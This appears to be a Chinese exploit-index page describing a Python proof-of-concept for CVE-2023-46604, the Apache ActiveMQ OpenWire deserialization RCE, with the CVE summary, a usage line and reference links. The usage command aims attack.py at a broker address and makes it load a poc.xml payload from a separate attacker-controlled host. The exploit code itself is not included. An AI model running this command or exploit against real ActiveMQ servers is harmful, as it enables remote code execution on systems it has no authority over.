关联漏洞
标题:
Apache ActiveMQ 代码问题漏洞
(CVE-2023-46604)
描述:Apache ActiveMQ是美国阿帕奇(Apache)基金会的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。 Apache ActiveMQ 5.15.16之前、5.16.7之前、5.17.6之前或5.18.3之前版本存在代码问题漏洞,该漏洞源于允许具有代理网络访问权限的远程攻击者通过操纵 OpenWire 协议中的序列化类类型来运行任意 shell 命令。
描述
CVE-2023-46604 Apache ActiveMQ RCE exp 基于python
介绍
# 项目参考
本项目是参考 https://github.com/X1r0z/ActiveMQ-RCE 项目的 `exp` 来重写的一个 `python` 版本的 `exp` 。
# 用法
```shell
python attack.py -u 192.168.163.129 -x http://192.168.163.133:10001/poc.xml -p 61616
```
其中 `-p` 参数默认为 `activeMQ` 的默认端口。`-x` 参数注意需要加上协议的前缀。
# 介绍
这里附上 `openwire` 协议的图示就很明白了。
下面给出的是 `Throwable` 类型的数据包格式。

具体的漏洞分析见下面的参考文章。
# 参考文章
```
# openwire协议的分析
https://github.com/X1r0z
https://activemq.apache.org/openwire-version-2-specification
# CVE漏洞原理的分析
https://exp10it.cn/2023/10/apache-activemq-%E7%89%88%E6%9C%AC-5.18.3-rce-%E5%88%86%E6%9E%90/
```
文件快照
[4.0K] /data/pocs/609d09d4c024990394095af86918e31a2e1928a1
├── [2.3K] attack.py
├── [4.0K] imgs
│ └── [ 63K] 1699429752916.png
└── [ 815] README.md
1 directory, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。